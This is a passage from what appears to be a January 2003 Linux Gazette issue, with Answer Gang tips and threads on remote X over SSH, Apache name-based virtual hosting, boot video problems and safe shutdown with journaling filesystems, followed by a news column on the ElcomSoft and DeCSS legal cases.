1. You may be able to just use "-o ro,loop" instead and let it choose an unused loopback device, see the manpage for details.
2. The manual says it's more convenient to mount and unmount loopback devices if /etc/mtab is a regular file and not a symbolic link to /proc/mounts. That answers another question The Answer Gang was unsure about a couple months ago, whether you lose anything by symlinking the two together. (What you gain by symlinking them together is that /etc/mtab -- and thus what "mount" without options reports -- will always be up to date.)

[Dan] A free trial of mswin software that will let you open, create, and extract (we guess this means "view the filesystem inside of") ISO files.

http://www.undisker.com/download.html

Remote X over SSH

You need a user account for the host you want to login to. The server should be accessible over SSH (normally TCP/22), and should have X11 forwarding configured.

$ netstat -a |grep ssh
tcp        0      0 *:ssh                   *:*                     LISTEN
$ grep orwarding /etc/ssh/sshd_config
X11Forwarding yes

X server and SSH client for Windows(r)

• Putty, SSH client suite http://www.chiark.greenend.org.uk/~sgtatham/putty
• StarNet's X-Win32 (commercial) http://www.starnet.com
• MicroImages MI/X for Windows (commercial, but very cheap; free demo.) http://www.microimages.com/freestuf/mix
• X server: Cygwin's XFree port to win32 (open source) http://www.cygwin.com/xfree
• Xserver: fwx (a much smaller, dustier project) http://sourceforge.net/projects/fwx %+% %-
• start your Xserver. We'll assume it's called xs.exe
• start Putty
• activate X11 forwarding in Putty
• activate SSH 2 protokoll
• configure SSH port, normally 22
• connect to server user@1.2.3.4
• enter password

On UNIX, BSD or Linux you can use any X server and SSH client you want.

$ ssh -X user@1.2.3.4
user@1.2.3.4's password:

Starting the window manager

This will start the amiwm window manager in the background and display it on your X server window (xs.exe).

$ amiwm &

Screen in five minutes

We become super-user.

$ su
Password:

We start iptraf as daemon (screen session in detached mode).

# screen -dmS iptraf iptraf

We list our SockDir.

# screen -ls
There are screens on:
        604.iptraf      (Detached)
1 Socket in /var/run/screen/S-root.

We reattach to our detached screen process and detach from it.

# screen -r
<ctrl-a-d>
[detached]

Gürkan Sengün

http://www.linuks.mine.nu
Windoze not found: (C)heer, (P)arty or (D)ance?

Debian User Worldmap

A fun thing to do; see where fellow Debian users are, check in. I will try to make the page better with time: Like click on a place and find friends (a list) nearby, show how it's done etc...

http://www.linuks.mine.nu/debian-worldmap

Gürkan Sengün

http://www.linuks.mine.nu
Windoze not found: (C)heer, (P)arty or (D)ance?

Remote control of Linux from Windows

Hello,

I live in LaGrange, Missouri. I have downloaded the iso's for

Mandrake 9.0. I have installed it once. I then took it off to have Windows again.

[Thomas] Oh, dear. You do know that, Tux doesn't bite that hard.

My brother had a Linux Router, and I wanted it to act as a server, but he said it wouldn't.

[Thomas] Your brother is deluded

But I have a second computer in my room. I want to add this behind my dad's desk with a 5' network cable, instead some more 100' cable to run to my room. I wanted to know a good app to run a remote desktop connection on it. I have downloaded one program called X-Win 32.

[Thomas] "A good app" -- well that depends on what you want the server to do. Your server, once it is up and running can support (amongst others): file serving, print serving, webserver, phpserver, mysql server, mail serving, etc...................

If you find you don't like that one, there arre a few other X servers mentioned in "(#tips.19)Remote X over ssh" above. -- Heather

I have Windows XP on my main computer. It has a remote desktop built in.

The open source client for that protocol is called rdesktop: http://www.rdesktop.org

But I don't know if anything on Linux serves that protocol so the windows remote-desktop client can view it.

VNC is another possibility, and may be needed if you want to share the desktop with more than one person - here's a KDE remote sharing project that uses it: http://www.tjansen.de/krfb -- Heather

I also wanted to know if it had to have a keyboard, mouse, and monitor hooked up to it at all times, even though I will have some sort of remote desktop app.

Thank You,
Brandon Dean

[Thomas] Nope, my 486 Server has no monitor, keyboard or mouse, since during the odd occassion that I have to log into the server, it is done via SSH which I can run from the command-line.

Although if your using Windows, then I suggest the use of "putty.exe".

This is also mentioned in the "(#tips.19)remote X over ssh" tip. For occasional access over a serial cable, see the "(#tips.6)headless server" tip.

As long as your BIOS is happy when you don't have these things, Linux doesn't mind at all. -- Heather

Contents:

¶: Greetings From Heather Stern

Troubleshooting boot-time video mode problems

NameVirtualHost in Apache

shutdown down the system using power switch --or--

alternatives for the Big Red Switch
consider journaling...

Question on writing Server program for multiple client connections.

Greetings from Heather Stern

Hello everyone, and welcome not only to the world of the Answer Gang, but a very Happy New Year!

Considering how terrible the economy is these days, Linux didn't do too badly for itself. The question is increasingly not "is that linux thingy safe enough to use in our enterprise" but "where can it serve us" ... with the advent of stabler desktop software has come some legitimacy, even among sites that really don't care as much about their desktops. Also as our installers have been improving, near as I can tell from the messages, Windows' has been getting worse, and the number of mswin distrss is increasing the chance that formerly innocent end-users will someday soon have to endure installing a new OS. And there are a fair number of free-OS hardware vendors now; the preload advantage is no longer entirely in Redmond's court, either.

Heck, Red Hat's in the black too. Not a bad year for the penguin.

Statistics, statistics. That brings me to the Gang's message queue. It was really light tthis month, about half the usual volume. I'm not even counting the spam, which we hardly see anymore. (Thanks Dan! Bunches!) And if we had ignored everything that had come as HTML or text+HTML rather than plaintext, we darn near could have gone on vacation, leaving me to gather threads from past months.

Fear not, however. We do have some good stuff here. There were plenty of good tips as well.

Of course it's time for some new years' resolutions. Being a rather techie soul -- gosh! who could have guessed?? -- I'm for 600x600 full color. dpi, that is. A pal of mine gave me a scanner as a winter-gift. Now all I have to do is find desk space and some time to drop SANE (Scanner Access Now Easy) into place. My dream last year of LCD prices coming down decently hasn't really settled in yet.

For a more serious resolution, regular backups. The day your computer decides to go on a magnetic starvation diet and lose a few pounds ... approximately the weight of one hard disk ... will be really annoying if you don't have 'em. Too bad DVD writing devices are still such a pain in the butt to use. They seem to be where video cards were a year or two ago - if it works then it's just beautiful right out of the box. And if it doesn't... well, have a lot of fun digging through docs and scratching your head in puzzlement. I've barely met anyone who's actually done it yet... and DVD-RAM doesn't count, since it's a different media entirely from the DVD-R and DVD+R. For that matter a mere 9Gb at a time is chicken feed to some modern drive setups. I think most folk will be backing up their medium size hard disks to even larger hard disks this year.

Have a great month, folks.

Troubleshooting boot-time video mode problems

From Scott Rafferty

Answered By Joshua Jeffrey Wingstrom, Karl-Heinz Herrman, Matthias Posseldt

In reply to TAG #2, Issue 77

Josh,

Sorry for the intrusion. Came across your name in a linux archive. Your brother had a similar problem to the one I'm having right now and I was wondering if he managed to resolve the issue. The problem is the blank screen on bootup (no boot messages, no logon prompt etc)...I kinda agree with your hardware/card theory as I too am using a GEFORCE 2 card.

I can get the console text/logon prompt to appear by logging in (although I can't see what I'm typing) and starting X and then quitting X. This seems to "restore the correct mode" and the text logon prompt appears fine.

Booting up rescue mode or doing a text install from the CD seems to show the console text no problem though so why would my newly installed kernel just blank the screen.

[K.-H.] just an idea:

• text-install uses a plain text console
• rescue CD's/floopy use a plain text console

but: At least SuSE's regular boot process shows a penguin or something and therefore must have switched to some non-text console (VGA mode). Maybe your card doesn't like that?

boot messages are of course always readable later on via dmesg, but I agree that if something goes wrong and boot hangs it would be nice to see the messages....

Very little information on this problem in general. It's extremely frustrating. I'd like to see my boot messages. Interestingly enough I've encountered the same problem with Mandrake and Redhat on the same system. I could buy a new card of course but I'm determined to get to the bottom of this.

If I've intruded, please accept my apologies in advance.

Scott Rafferty

[Joshua]

Scott, Thanks for contacting me. I would like to resolve this too.

I have since switched to Gentoo and the problem does not occur there.

I think that the problem is related to the bootsplash screens that Mandrake and Redhat use. The GEFORCE 2 does not seem to want to be switch into... I'm guessing VESA mode?... in the manner in which these applications are switching it. I think that this can be fixed by using the bootsplash utility from Mandrake. The CVS code for this is available at:

http://cvs.mandrakesoft.com/cgi-bin/cvsweb.cgi/soft/bootsplash

I would look at the documenatation and try to turn off the bootscreen. If this fixes the problem, try changing boot screen resolutions. Otherwise, I'm guessing we'll have to start looking at kernel configurations.

Happy hunting, Josh

After scouring google yesterday for an answer to my NO BOOT MESSAGES problem there was one interesting comment I came across about settings in the BIOS. So late last night I made 2 changes to my BIOS settings. Now I can see all my boot messages. A simple but no less important solution to a frustrating problem.

The changes I made to the BIOS were these (screenshot links included) --

Enabled the memory hole from 15-16 M

http://www.motherboards.org/images/15/2002/1204_p2_11.jpg

Changed Primary VGA BIOS to [AGP VGA Card] - Was set to [PCI VGA Card].

http://www.motherboards.org/images/15/2002/1204_p2_9.jpg

[Matthias] I'm pretty sure it is only the second BIOS setting which has to do with the VGA problem. You better disable the first option again, because it's more trouble than it's worth. And it is a "legacy" option, for systems which use VGA cards older then 1994 or so. Almost any system is newer to when this setting was important. In your PC timeline, order it in before "MS Windows 3.0 finally arrived. Bad OS/2 clone, btw."

Different BIOS's will have different settings of course but I think these two are pretty standard across the board.

One thing to note - I had to actually switch the power off after making the changes (rather than just rebooting) for the changes to take complete effect. I also could have narrowed it down a little further to just the one BIOS change but it was late and I was so elated that I just forgot. If anyone wants me to delve further then just ask.

I really hope this helps other people with the same problem. I'm sure anyone in the know will understand exactly why these 2 settings would effect the linux bootup in such a way with some of the NVIDIA cards. I don't though.

Cheers, Scott

[Matthias] It has to do with the AGP way of life . AGP cards have two modes. The "PCI equivalent" simple mode where they can display character mode terminals etc, and the "AGP full featured mode" where they run full power. The second mode has to be supported by the Operating System with some driver and AGP layer.

And it seems that -- while the BIOS can display characters -- Linux cannot display them for some reason. Maybe because it sends PCI only commands or tries to detect the VGA card on the PCI bus and fails correctly handling

NameVirtualHost in Apache

From Rich Price

Answered By Huibert Alblas, Faber Fedor, Mike "Iron" Orr, Heather Stern

I am running Slackware 7.1.0 and Apache/1.3.12 on my web server which I have been running for many years. Recently, I acquired a second domain name and I attempted to use name based virtual hosting to support both domains on this server.

I have been unable to configure apache to do this. I have been using the second edition of "Apache The Definitive Guide" by Ben and Peter Laurie as a guide. But repeated attempts to come up with a httpd.conf file have resulted in either both web sites showing the same [primary site] pages or in both sites showing an error page.

I have a number of questions that the Laurie's book has not been able to answer:

1. Can you have both a primary site and a "NameVirtualHost" site that use
2. Can you have both a primary site and a "NameVirtualHost" site that use the same IP address?
3. Should I make both sites be "NameVirtualHost" sites?
4. Should I make both sites be "NameVirtualHost" sites?
5. Is there anything obviously wrong with these httpd.conf statements?
6. Is there anything obviously wrong with these httpd.conf statements?

#
NameVirtualHost aaa.bbb.ccc.ddd
<VirtualHost virt-host-name>
   ServerAdmin relevant-email-address
   DocumentRoot /websites/virthost/htdocs
   ErrorLog /var/log/error_log
   CustomLog /var/log/access_log common
</VirtualHost>
#

Any advice would be appreciated!

Rich Price

[Halb] Yes, as far as I can see you're missing the ServerName entry:

 <VirtualHost virt-host-name>

    ServerName virt-host-name

    ServerAdmin relevant-email-address
    DocumentRoot /websites/virthost/htdocs
    ErrorLog /var/log/error_log
    CustomLog /var/log/access_log common
 </VirtualHost>

Hope it helps

Thanks for your reply. But my problem remains.

When I add the NameVirtualHost and <VirtualHost > commands [with the ServerName statement] to the end of the httpd.conf file, I get the "HTTP 404 - File not found" error message when trying to access either website.

[Faber] Hang on. From what I've seen in this thread, you need to do this:

NameVirtualHost aaa.bbb.ccc.ddd

<VirtualHost aaa.bbb.ccc.ddd>   <-- note this nibbly bit
    ServerName virt-host-name
    <...snip...>
</VirtualHost>

NOT

NameVirtualHost aaa.bbb.ccc.ddd

<VirtualHost virt-host-name>    <-- this line is the problem
    ServerName virt-host-name
    <...snip...>
</VirtualHost>

[Iron] That's how our sites are set up, those that do name virtual host. However, the Apache docs (version 1.3) say you can use either the IP or domain name, although they recommend the IP for the NameVirtualHost line. I would thus use the IP on both the NameVirtualHost and VirtualHost lines so it's easier for the person to match up which VirtualHost stanzas go with which NameVirtualHost.

Note that you can also use ServerAlias to define multiple names for one virtual host:

NameVirtualHost 10.0.0.1:8080
<VirtualHost 10.0.0.1:8080>
  ServerName buffy.vampire.slayer
  ServerAlias www.buffy.vampire.slayer
  ...
</VirtualHost>

This can be called the "Rick Moen can't get his users trained not to type the 'www'" approach.

I figgured it out!!!!

The Apache online documentation says:

So I added the origional "main server" as another virtual host like this:

See attached named-host.httpd.conf

And the original host continued to work with the new httpd.conf file.

The problem with the new host turned out to be a misspelled directory path. [I blush with shame].

Thanks for all the help.

Rich Price

[Iron] Oh, OK. Often you think the problem is one thing but it turns out to be something else.

[Heather] So, I didn't join this thread when it was active during the month, and here I am adding this as I edit the thread. But I figured it would be valuable to complete the example.

You need to have permissions for the directory set up in your httpd.conf too, since the very default permissions usually explicitly describe that anywhere in the web tree should be inaccessible unless opened up (or possibly, only open to localhost). The defaults may work pretty well until you start moving your web directories to a place unplanned for by your installation of Apache. (For example, having a websites directory off of the root directory, not exactly LSB compliant , but heck, it's your server.) That Rich misspelled this little tidbit, then realized and spelled it right, is what fixed him. So here's that part, presuming that these are pages for access by a world of visitors, not just a limited number of friends.

AllowOverride suggests what things .htaccess control files can affect.

See attached host-directories.httpd.conf

Now, the fact that he mentions "htdocs" suggests that he probably also has a dedicated cgi directory and maybe even a dedicated icons directory (so fancy indexing gets a touch of local flavor). So here's an expanded and slightly fancier example that covers the lot, and puts things in a slightly more reasonable place in the directory tree. Also I seperate the logs.

See attached completist.httpd.conf

Of course, to use my example you should also touch and set permissions for the logfiles you'll be keeping, and give them group permission that allows the webmasters to see their own stuff.

You'll want to change that "lettered" IP address to a real one. You can use 127.0.0.2 and a bunch of entries in your /etc/hosts file to test things out if you need to. DNS "A records" should exist pointing these sites to your IP addrress; it might be good if the less preferred names (the ServerAlias values) are all CNAMEs to their primaries, so that at least a few browsers will get the hint when bookmarking.

See attached test-fragment.etc-hosts.txt

Create /home/websites/virthost1 and its subdirectory /errors with 2 files in it, likewise for virthost2, and copy their sets of icons in.

Make sure that the webfiles and grpahics for the web are world readable in your filesystem too, so the webdaemon (which usually runs as an unprivileged user, either 'nobody' or one dedicated to run only apache) can access the files. They can be group writable by the webmaster for the given site.

Keeping the custom error pages in the directory "errors" under the web tree and numbered like that is compatible with thttpd; so is the attitude that everything under the htdocs directories iw world-readable at the filesystem. To really go whole hog with that, your virthostX directories would be named the same as the preferred name of the site instead, and your thttpd.conf would contain the lines:


dir=/home/websites
vhost

Useful to know if you're switching over in a hurry if there is some nasty apache hole that's been discovered and you can't afford to have the websites down while the patch is being prepared. Set symlinks for the ServerAliased names and it should just work, though your cgi scripts will be dead without additional setup, thttpd doesn't do fancy indices, and the logs will be somewhere new.

Add norobots.txt files for spice if you like to keep your sites from being web-indexed until they are ready.

See attached simple.norobots.txt

When things are good you can take out the second Disallow and replace it with lines for specific places that shouldn't be traversed.

After you've finished mixing all these ingredients in a big mixing bowl labelled "disk space", season to taste, stuff in the oven, bake at 450 for 10 seconds, frost. Serves thousands.

alternatives for the Big Red Switch

consider journaling...

From Mark Morshedi

Answered By Thomas Adams, David Mandala, John Karns, Rick Moen, Mike "Iron" Orr, Didier Heyden, Heather Stern

What if the only option is to use the power switch to turn off the system. there are times that mouse doesn't work and keyboard is dead. how does one manages that without destorying the file system.

thanks

[Thomas] My first indication is that this is VERY much hardware specific. You should check that your motherboard can handle processes like the one that you wish to implement under linux.

Typically the programs that you would want to use are: "apm" which is most likely, the program that will control the "power-down" feature via the power button anyway, and also "lm_sensors" so that you can get the current state of your system.

As far as not allowing the filesystem to get mangled, you can set the maximum mount check point to an arbitrary value (I have it set at 100), using the "tune2fs" program. Thus you can specify:

tune2fs -c 100

means that your filesystem WONT be checked until it has been mounted 100 times. You can extend this further to say that:

tune2fs -i [d/m] whereby you can set the next check to
be in either days or months. Have a look at "man
tune2fs" for more details.

[Heather] Note that lm_sensors is specifically not recommended for some hardware; some thinkpad models crash hard and in fact the hardware suffers wickedly (see http://www.linux-thinkpad.org for details). Do check the internet for comments about lm_sensors and your motherboard before just brazenly invoking it.

[David] One can try the three finger salute Control Alt Delete which sometimes will cause a orderly shutdown and restart. Or one can use the ext3 filesystem option on newer versions of Linux which are safer to data loss.

If the machine is networked you could try sshing or telnetting into the locked machine, sometimes the console is locked but the machine is still active on the network and you can gain control that way.

[John] Re: journaling filesystems (ext3 mentioned below) I've been very happy with reiserfs over the past 18 months. Then there is the SGI (?) contributed XFS. See the LG issue 68 article about journaling filesystems for more info about them.

The magic SysRQ can also help, unless the kernel is locked up hard. It's worked for me on a number of occasions. For a system lock-up, the key sequence that I most often use is Alt-SysRq-S, Alt-SysRq-U, and Alt-SysRq-B which syncs buffers, unmounts fs's, and reboots, respectively. You may need to recompile your kernel to enable the feature though. For moe info, see /usr/src/linux/Documentation/sysrq.txt

[David] I remember reading somewhere how to hook up the power switch on an ATX power supply to do an orderly shutdown but I don't remember where. Anybody else remember?

[Rick] You might be thinking of Joris van Rantwijk's Linux PowerSwitch Driver. Description: "The powerswitch driver makes it possible to use the ATX power button on your computer to shutdown Linux. You simply press the power button, and the driver shuts down Linux and powers off the machine, just like the shutdown command does."

http://deadlock.et.tudelft.nl/~joris/powerswitch

A different approach:

http://www.geocrawler.com/archives/3/38/1999/9/50/2611153

Or a kernel patch for the ACPI code:

http://www.cs.helsinki.fi/linux/linux-kernel/2001-31/0968.html

[Iron] Since this is a different driver than the keyboard driver, it may work even when the keyboard doesn't respond. However, if not losing data is your primary concern, the first step to do is to switch to a journalled filesystem. It's easy to switch from ext2 to ext3.

1. Make sure your kernel has ext3 support compiled in. (Not a module, because you don't want it to fail if something happens to the module files.)
2. Boot to single-user mode (or use "telinit s").
3. For each filesystem:
   1. Verify it's unmounted or mounted read-only.
   2. Run "tune2fs -j /dev/THE_PARTITION".
4. Change "ext2" to "ext3" in /etc/fstab for the affected filesystems.
5. Switch back to multi-user mode.

You can also place /usr on a separate partition and mount it read-only except when installing software, to prevent those files from being corrupted in an unclean shutdown.

Make sure your rescue floppy (from your distribution, www.toms.net/rb/, etc) has support for the journalled filesystem you're using, or you won't be able to repair it from the floppy. Last I saw, Tom's supported ext3 out of the box, but for ReiserFS you had to put a custom kernel on the floppy. You may also want to leave /boot as ext2 (mounted read-only of course) to ensure it's repairable from the widest variety of rescue floppies, should the need ever arise.

Of course, you'll also want to determine why the keyboard is not responding and how to fix it. However, if you're stuck with unreliable hardware, immature drivers for your gee-whiz must-have peripherals, or you occasionally run out of both memory and swap, there's not much you can do except press the reset button or the power switch.

[Didier] I'm being rather off-topic here, but this summarizes perfectly the problem I had with my old graphics board -- a hardware issue ... seemingly solved by replacing the defective (or MVP3-incompatible) thing with another video card.

[Iron] But your first line of defense when the console hangs is to try to ssh or telnet in from another computer, because usually those services are unaffected. It may take a long time if the system is "thrashing" (meaning free memory is so low it's constantly swapping to disk), but you may be able to do a clean "halt" or "reboot" command that way.

[Didier] Regarding 'ext3' however, it may be worth mentioning the following discussion about a data corruption bug recently found in the 2.4.20 kernel:

http://kerneltrap.org/node.php?id=515

The funny thing is, ever since I started using 2.4.x kernels, and regardless of the actual 'ext' filesystem subtype, I've had to 'sync' multiple times and introduce artificial delays right before powering off the beast, otherwise the filesystems are almost invariably found to "have not been unmounted cleanly" on the next boot.

[Heather] The nature of the problem, and a workaround, is summarized nicely on this kernel-traffic entry: http://kt.zork.net/kernel-traffic/kt20021209_195.html#16

This bug has been caught and the patch is now available; to be safe you need to be either using an early enough kernel (the nasty bug was introduced in 2.4.20-pre5, but I think I saw discussion about interaction with a more subtle bug that lurked in the 2.4.19 series) or a late enough one (this one was nailed in 2.4.20-pre1, and two more notable ext3 bugs were nailed in -pre2).

When I realized that some of my dev work was going to heavily crash my development workstation, I decided I needed journals; saving everything aside for a thorough reiserfs makeover looked like no fun, so ext3 was my first try. That was when 2.4.19-pre10 was current and I've not encountered any sync problems; I'd certainly know, because a lot of my testing involves swapping drives around, so I'm up and down all the time deliberately as well. Also, It's not at all clear whether this ever affected the backported-to-2.2.x ext3 support, since the main flaw was in an optimization trick.

There was apparently some benchmark comparing reiserfs and ext3 mid-year 2002; it generated an awful lot of mailing list traffic at the time, easy to find in Google/linux when looking for both keywords together.

Question on writing Server program for multiple client connections.

From vidya srinivasan

Answered By Faber Fedor, Kapil Hari Paranjape, Jim Dennis

Hi,

I had a question regarding servers. I want to know what happens when a server listening for multiple connections at a single port receives packets from two clients at the same time on the same port? Will the server discard one packet or accept both? Is there an order with which it accepts/discards them?

Thanks for replying in advance.

Sincerely, Vidya.

[Faber] Two packets will never arrive at the port at the same time. For LAN technologies that I know of (Ethernet, Token Ring, ATM), there is only one packet on the wire at a time. Look into "Carrier Sense, Multiple Access/Collision Detection" to see how Ethernet does it.

I have no idea what happens on the really big pipes.

[Kapil] I don't think the question is well phrased. Do you mean this from the kernel programmer's point of view or the socket programmer's point of view. I only understand something of the latter, which is explained below.

The man pages for socket(2), bind(2), listen(2), accept(2) and select(2) explain things quite well. The "info" pages for glibc are also a good source.

The final (presumably desirable) outcome of socket programming is to create a "socket connection" of the form (LOCALIP:PORT::REMOTEIP:PORT) which each of the processes (the local one and the remote one) can treat like a file descriptor for reading from and writing to.

If a program wishes to handle multiple connections of this type, then it must do this exactly in the way it would handle many files at the same time---by forking, threading or running on thousands of processors if possible

The actual creation of the socket is handled by the kernel (in Linux) or the network daemon (in the Hurd). What the socket programmer does is to tell the kernel that

1. a socket is needed via "socket"
2. is to be bound to LOCALIP:PORT via "bind"
3. to listen for (and queue) incoming connections via "listen"
4. to accept a queued incoming (completed with REMOTEIP:PORT connection via "accept"

A file handle/descriptor is created in step (d). At this point the programmer must decide whether the program will handle multiple calls or not; in case the program(mer) feels energetic enough the process forks or creates a new thread which then interacts with this particular file descriptor.

The "select" call is a mechanism by which the program notifies the kernel that it is waiting to "accept" and the kernel notifies the program when there is something to "accept".

[JimD] I think the gist of his question was: How does the system disambiguate among multiple connection to the same TCP port?

The (short) answer is: All sockets (at any given point in time) are a unique combination of the following: source IP address, source port, destination IP address and destination port (and protocol, UDP or TCP). Thus the kernel internally routes data to the correct socket by looking at the source port as well as the the destination port.

I hope that's sufficient.

...making Linux just a little more fun!

News Bytes By Michael Conry

Contents: Legislation and More Legislation Linux Links Conferences and Events News in General Distro News Software and Product News

Selected and formatted by Michael Conry

Submitters, send your News Bytes items in PLAIN TEXT format. Other formats may be rejected without reading. You have been warned! A one- or two-paragraph summary plus URL gets you a better announcement than an entire press release. Submit items to gazette@ssc.com

January 2003 Linux Journal

All articles older than three months are available for public reading at http://www.linuxjournal.com/magazine.php. Recent articles are available on-line for subscribers only at http://interactive.linuxjournal.com/.

ElcomSoft Innocent

Dmitry's incarceration was to last 3 weeks, subsequent to which he was required to remain in the United States for a further 6 months while various legal details were hammered out. The result was that Dmitry would not have to face prosecution. Instead his employer, ElcomSoft, would have to face the charges, and Dmitry would be obliged to return to the US to testify in the trial. In the course of these events, widespread public opinion was sympathetic to Dmitry's plight, and this was likely a factor in Adobe's distancing itself from the case. Notwithstanding this, Adobe is still (as reported by The Register) a strong supporter of the DMCA, and advocates further criminal prosecutions.

In the intervening period leading up to the current trial, unsuccessful attempts were made to pre-emptively stop the prosecution based on challenges to the constitutionality of the DMCA law. These arguments were based on assertions of the right to free speech (including the rights of third parties to fair use of copyright materials), and also on a claim that the law was so vague as to be unconstitutional. Judge Ronald Whyte dismissed these motions in May 2002. Although the Judge accepted that computer code was free speech, he asserted that the DMCA was content neutral and thus dealt with computer programs on the basis of its purpose, rather than its content. He also decided that no fair use was prohibited by the DMCA, while acknowledging that many uses may be made substantially more difficult. Whyte also ruled that the law was sufficiently precise to be constitutional. This decision is a significant victory for the DMCA supporters, as was noted by Lewis Clayton in his review of IP cases in 2002, and strengthens the legitimacy of the law.

Following some difficulties with visas and the US State Department, Dmitry and Alex Katalov (chief executive of ElcomSoft) finally travelled to California in December 2002 for the trial. Some transcripts from the trial have been made available online. Additionally, Lisa Rein has done a good job of reporting on the court proceedings. A significant point on which the trial hinged was whether ElcomSoft wilfully broke the law. It was the jury's opinion that while ElcomSoft's product may have violated the DMCA, they did not distribute it while aware of this infringement. The open manner in which the product was distributed contributed to this image. The jury is also reported as having difficulties with the severe curtailment of users' rights inherent in the application of the DMCA to the ebook format.

The consequences of the verdict are unclear. Don Marti believes it is a hugely positive development, and that Federal prosecutors will be slow to attempt another DMCA criminal case given the failure of the ElcomSoft prosecution. Linux Weekly News is less upbeat, and sees this primarily as a victory for ElcomSoft. The point is made that it has now been shown that the DMCA can lead to "expensive criminal trials and arrests, even if they win in the end". This is only partly true, since as Don points out, the Federal authorities will only prosecute cases they believe can be won, and the ElcomSoft verdict raises the standard of evidence required to justify such an opinion. However, the civil-law provisions of the DMCA can also be used to cripple smaller companies with the burden of an expensive DMCA defence, and it is at the discretion of the complainant if and when to bring such cases.

Below is a quasi-random selection of the recent media reporting on the case, arranged in approximately chronological order.

• Gov't tightens its case in hacking trial [ZDNet]
• Opening Salvos in ElcomSoft Trial [Wired]
• ElcomSoft programmer takes stand [SiliconValley.com]
• 'I'm no hacker', Sklyarov tells US court [The Register]
• Trial told no proof of ebook piracy [Reuters]
• Defense rests in ElcomSoft copyright trial [SiliconValley.com]
• Testimony ends in Adobe hacking trial [News.com]
• Jury scrutinises DMCA in ElcomSoft case [The Register]
• ElcomSoft Jury Asks for Law Text [Wired]
• ElcomSoft verdict: Not guilty [News.com]
• Firm beats digital copyright charge [Detroit Free Press]
• ElcomSoft found innocent in DMCA case [2600]
• Software Hackers 1, DMCA 0 [Tom's Hardware]
• Verdict Seen As Blow to DMCA [Wired]

DVD Jon

Jon Johansen is another young man who has found himself in court in the past month as a consequence of his involvement in software development. Jon's case began three years ago, when the young Norwegian participated in the development of the DeCSS program. The purpose of DeCSS was to allow playback of DVD movies on systems, such as Linux, which lacked DVD playback software. Though Johansen has been strongly associated with the DeCSS software, he is keen to point out that he was only a minor collaborator in its development. However, the other collaborators in the project have remained anonymous, leaving Johansen facing criminal charges in a Norwegian court.

Though Jon could have faced up to 2 years in jail, the prosecution has sought a sentence of 3 months probation along with payment of US$1400 court fees and confiscation of his computers should he be found guilty. Jon has strongly defended his innocence. Prosecution questioning appears to have focused on the possible use of DeCSS for DVD piracy. Johansen has argued that although DeCSS could possibly be used in some forms of piracy, piracy is entirely possible and quite easy even without DeCSS. The primary purpose of DeCSS is the playback of DVDs that customers have legally purchased. A verdict is expected early in January 2003.

It is worth putting this case in the context of other cases which have been taken in the US to suppress DeCSS. Cryptome has a large number of documents relating to these cases, as does the EFF. Of particular interest is Jon Johansen's testimony in the New York DeCSS trial, where he gives much of the background to these cases. Though Jon's trial relates to the actual development of the software and breaking protection on a DVD, in the case of the NY trial the issue concerned the legality of simply linking to DeCSS on the internet. Many have objected strongly to these draconian prosecutions, and have ridiculed the law by finding novel, clever or humorous ways to distribute DeCSS. An example is Phil Carmody's publication of a prime number which is also, neatly, a valid DeCSS executable. This follows from his first "illegal" prime which contains the DeCSS source code.

The Yes Men

The DMCA has also found use in efforts to silence a group of satirical impostors, known as The Yes Men. A parody website, which was located at www.dow-chemical.com, was constructed to draw attention to the 18 year legacy of the Union Carbide chemical disaster in Bhopal, India which killed 20,000 people. Union Carbide is now a part of the larger Dow company. On the 18th anniversary of the tragedy, a hoax press release was issued, purporting to be from Dow and addressing why Dow was unable to accept responsibility for the injuries and deaths.

"We understand the anger and hurt," said Dow Spokesperson Bob Questra. "But Dow does not and cannot acknowledge responsibility. If we did, not only would we be required to expend many billions of dollars on cleanup and compensation--much worse, the public could then point to Dow as a precedent in other big cases."

Dow's reaction was one of anger, and a letter was sent to the site's upstream provider verio.com requiring the removal of the website. This communication served notice of a violation of the DMCA (the parody used logos and designs from the original Dow website), and this effectively obliged Verio to take immediate action. Verio withdrew service to Thing.net, the New York activist oriented ISP hosting The Yes Men's site. This action simultaneously took down a range of unrelated arts based websites. Subsequently, Verio has served notice that Thing.net must relocate to another provider within 60 days, after which point service will be terminated.

As well as intimidating the service providers, Dow succeeded in taking control of the www.dow-chemical.com domain name (which it turns out they owned, as it was registered by the pranksters in the name of James Parker, son of the Dow CEO). Nevertheless, the website can be viewed at numerous mirrors. A list of current mirrors can be found in The Yes Men's account of events. The original press release is also included.

Australian newspaper, The Age, has published an interview with Rick Moen (yes, the Rick Moen of The Answer Gang).

LinuxDevices.com has published the proceedings from the Fourth Real-Time Linux Workshop held December 6-7, 2002 in Boston.

Some links of particular interest from Linux Weekly News:

• Dave Jones explains what's new in the 2.5 kernel and what problems 2.4 users might encounter if they upgrade.
• Germany sees security in Linux
• klisa security update
• KDE 2.x and KDE 3.x fails to quote arguments to shell commands properly. No exploits are known, but updates have been released.
• EU copyright deadline.
• Nvidia releases faster Linux drivers for its graphics cards. They are freely distributable, but the source is closed.

An encouraging Siliconvalley.com report on the accessibility of Linux to new users.

Vanishing Features of the 2.6 Kernel.

Dustin Puryear explores recent enhancements to Samba. (Dustin is also an LG author.)

The BBC reports on free software, as explained by Richard Stallman.

Fitting a computer to an albatross.

Some interesting stories from The Register:

• Amnesty criticises tech giants for 'aiding' Chinese human rights abuse.
• Open Source makes inroads in the EU.
• SSH flaws sighted. OpenSSH appears to be safe though.

Newsforge commentary on teaching GNU/Linux to new users.

PC World article reporting a study which says that the appeal of Linux is emotional rather than technical.

Tinyminds.org have interviewed kernel developer Robert Love. He discusses some issues relating to the current development kernel series, and how new features will manifest themselves for desktop users.

Some links highlighted by Linux Today:

• NewsFactor article on alternative web browsers, focus is on Konqueror and Opera.
• Brazilian petition (Portuguese) of President-elect Lula, urging him to favour free software over proprietary alternatives.
• Linux Productivity Magazine has run an issue focusing on VI and Vim.
• The Samaritans decides to use Linux.

Linux and Main, rewindable desktops. Summarises a paper by Bowie J. Poag.

Some links of interest from Linux Journal.

• The Real Battle at Comdex: Intellectual Property vs. Internet Protocol
• E-mail as a System Console, Part I explains how you can use procmail and fetchmail to build a program that will let you remotely control when a system makes a dial-up connection, how long it stays connected and when it disconnects. Part I explains the project and links to Part II.
• Book review of The Business and Economics of Linux and Open Source.
• An introduction to the concepts of linking and loading in Linux and why shared libraries are so useful.
• A discussion of Bluecurve.
• Phil Hughes, publisher of Linux Journal, has announced a new mailing list for people involved in moving government offices to open source, providing a forum for the questions, problems and solutions they all face in their work.

Santa considers switch to Linux, Red Hat is frontrunner.

